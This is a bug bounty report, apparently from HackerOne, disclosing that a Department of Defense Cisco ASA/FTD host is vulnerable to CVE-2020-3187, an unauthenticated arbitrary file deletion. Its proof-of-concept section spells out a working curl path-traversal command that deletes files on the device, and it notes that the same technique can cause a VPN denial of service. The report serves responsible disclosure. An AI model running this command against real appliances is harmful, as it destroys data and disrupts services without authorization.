Lucene search

K
hackeroneThemastersunilH1:1031437
HistoryNov 11, 2020 - 9:18 a.m.

U.S. Dept Of Defense: https://██████ vulnerable to CVE-2020-3187 - Unauthenticated arbitrary file deletion in Cisco ASA/FTD

2020-11-1109:18:46
themastersunil
hackerone.com
132

9.1 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

0.974 High

EPSS

Percentile

99.9%

Hi @U.S. Dept Of Defense, I found a host <https://██████> which is running on the web services interface of Cisco ASA/FTD and it is vulnerable to CVE-2020-3187 - Unauthenticated arbitrary file deletion in Cisco ASA/FTD. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences. An exploit could allow the attacker to view or delete arbitrary files on the targeted system. When the device is reloaded after the exploitation of this vulnerability, any files that were deleted are restored. The attacker can only view and delete files within the web services file system.

Proof of Concept:

Now we know that in CVE-2020-3187 - Unauthenticated arbitrary file deletion in Cisco ASA/FTD. This allow the attacker to view or delete arbitrary files on the targeted system
In this we can delete the files. For example the logo file present on the server at <https://████████/+CSCOU+/csco_logo.gif&gt; can be deleted by the following steps.

This can be done by sending a curl request as : curl -H “Cookie: token=…/+CSCOU+/csco_logo.gif” <https://███/+CSCOE+/session_password.html&gt;

  1. To delete this just hit the following command on your terminals.
    curl -H “Cookie: token=../+CSCOU+/csco_logo.gif” https://█████████/+CSCOE+/session_password.html

    If that did not work because sometimes logo.gif/png has permission issues so try this <https://█████/+CSCOE+/blank.html&gt;

  2. You can also delete the file “/+CSCOE+/blank.html” (an empty HTML file), as it might be a problem with the permission of the custom logo file sometimes logo.gif has permission issue so we might not be able to delete but we can delete other files

Warning : This can lead to a denial of service (DOS) on the VPN by deleting the lua source code files from the file system, which will break the WebVPN interface until the device is rebooted.

Now i haven’t deleted the logo file because i didn’t wanted to cause any damage so i used another method which can help us confirming that target is vulnerable to this without causing damage and for that just check if /+CSCOE+/session_password.html endpoint exists, and it gives “200 OK” status, then it should be vulnerable because this affected endpoint has been removed from the patched versions.

I sent a curl request to check and it gave 200 ok as shown below:
/+CSCOE+/session_password.html -&gt; 200 = Vulnerable
/+CSCOE+/session_password.html -&gt; 404 = Patched

Mitigation/Remediation Actions:

Upgrade the ASA software version per the referenced advisory. This advisory is available at the following link:
<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-path-JE3azWw43&gt;

Reference:

<https://twitter.com/aboul3la/status/1286809567989575685&gt;
<https://medium.com/@parasarora06/hunting-for-cve-2020-3187-2020-3452-9f0dcc66f4d8&gt;
<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-path-JE3azWw43&gt;
<http://packetstormsecurity.com/files/158648/Cisco-Adaptive-Security-Appliance-Software-9.7-Arbitrary-File-Deletion.html&gt;

Impact

High - This vulnerability allows the attacker to delete files within the web services file system.

9.1 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

0.974 High

EPSS

Percentile

99.9%